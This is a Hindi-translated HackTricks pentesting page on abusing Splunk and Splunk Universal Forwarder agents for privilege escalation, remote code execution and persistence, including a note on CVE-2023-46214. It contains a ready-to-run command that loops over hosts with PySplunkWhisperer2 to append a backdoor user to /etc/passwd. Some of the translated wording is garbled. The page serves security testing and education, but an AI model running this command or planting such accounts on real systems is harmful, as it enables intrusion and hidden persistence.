Splunk LPE and Persistence

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सदस्यता योजनाएं देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारा विशेष NFTs संग्रह, The PEASS Family खोजें
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके HackTricks और HackTricks Cloud github repos में।

यदि आप किसी मशीन को आंतरिक या बाह्य रूप से जाँचते समय Splunk चल रहा है (पोर्ट 8090), और यदि आपके पास किसी वैध क्रेडेंशियल्स का ज्ञान है, तो आप Splunk सेवा का दुरुपयोग करके उस उपयोगकर्ता के रूप में एक शैल को चला सकते हैं जो Splunk चला रहा है। यदि यह root द्वारा चलाया जा रहा है, तो आप विशेषाधिकारों को root के रूप में उन्नत कर सकते हैं।

इसके अलावा, यदि आप पहले से ही root हैं और Splunk सेवा केवल localhost पर सुन रही नहीं है, तो आप Splunk सेवा से पासवर्ड फ़ाइल चुरा सकते हैं और पासवर्ड क्रैक कर सकते हैं, या उसमें नए क्रेडेंशियल्स जोड़ सकते हैं। और मेजबान पर स्थिरता बनाए रख सकते हैं।

पहली छवि में नीचे आप देख सकते हैं कि एक Splunkd वेब पृष्ठ कैसा दिखता है।

स्प्लंक यूनिवर्सल फॉरवर्डर एजेंट शोषण सारांश

अधिक विवरण के लिए पोस्ट देखें https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/

शोषण अवलोकन: Splunk यूनिवर्सल फॉरवर्डर एजेंट (UF) को लक्षित करने वाला एक शोषण अटैक अटैकर्स को एजेंट पासवर्ड के साथ सिस्टम पर विचित्र कोड को निषेधित करने की अनुमति देता है, जिससे पूरी नेटवर्क को कंप्रमाइज किया जा सकता है।

मुख्य बिंदु:

UF एजेंट आने वाली कनेक्शनों या कोड की प्रामाणिकता की पुष्टि नहीं करता है, जिससे अनधिकृत कोड निषेध करने के लिए विकल्पशील हो जाता है।
सामान्य पासवर्ड प्राप्ति विधियों में उन्हें नेटवर्क निर्देशिकाओं, फ़ाइल साझाकरण या आंतरिक प्रलेखन में ढूंढना शामिल है।
सफल शोषण संक्रमित होस्ट पर SYSTEM या रूट स्तर की पहुंच, डेटा निकासीकरण और आगे की नेटवर्क घुसपैठ की ओर ले जा सकता है।

शोषण क्रियान्वयन:

हमलावर UF एजेंट पासवर्ड प्राप्त करता है।
एजेंट्स को कमांड या स्क्रिप्ट भेजने के लिए Splunk API का उपयोग करता है।
संभावित क्रियाएँ फ़ाइल निकासी, उपयोगकर्ता खाता प्रबंधन और सिस्टम कंप्रमाइज शामिल हैं।

प्रभाव:

प्रत्येक होस्ट पर SYSTEM/root स्तर की अनुमतियों के साथ पूरी नेटवर्क कंप्रमाइज।
पकड़ने से बचने के लिए लॉगिंग को निषेधित करने की संभावना।
बैकडोअर्स या रैंसमवेयर की स्थापना।

शोषण के लिए उदाहरण कमांड:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Splunk LPE और Persistence

उपयोगी सार्वजनिक उत्पाद:

Splunk क्वेरी का दुरुपयोग

अधिक विवरण के लिए पोस्ट देखें https://blog.hrncirik.net/cve-2023-46214-analysis

CVE-2023-46214 ने $SPLUNK_HOME/bin/scripts में एक विचित्र स्क्रिप्ट अपलोड करने की अनुमति दी और फिर बताया कि खोज क्वेरी |runshellscript script_name.sh का उपयोग करके वहाँ संग्रहित स्क्रिप्ट को क्रियान्वित करना संभव था।

PreviousSocket Command Injection NextSSH Forward Agent exploitation

Last updated 3 months ago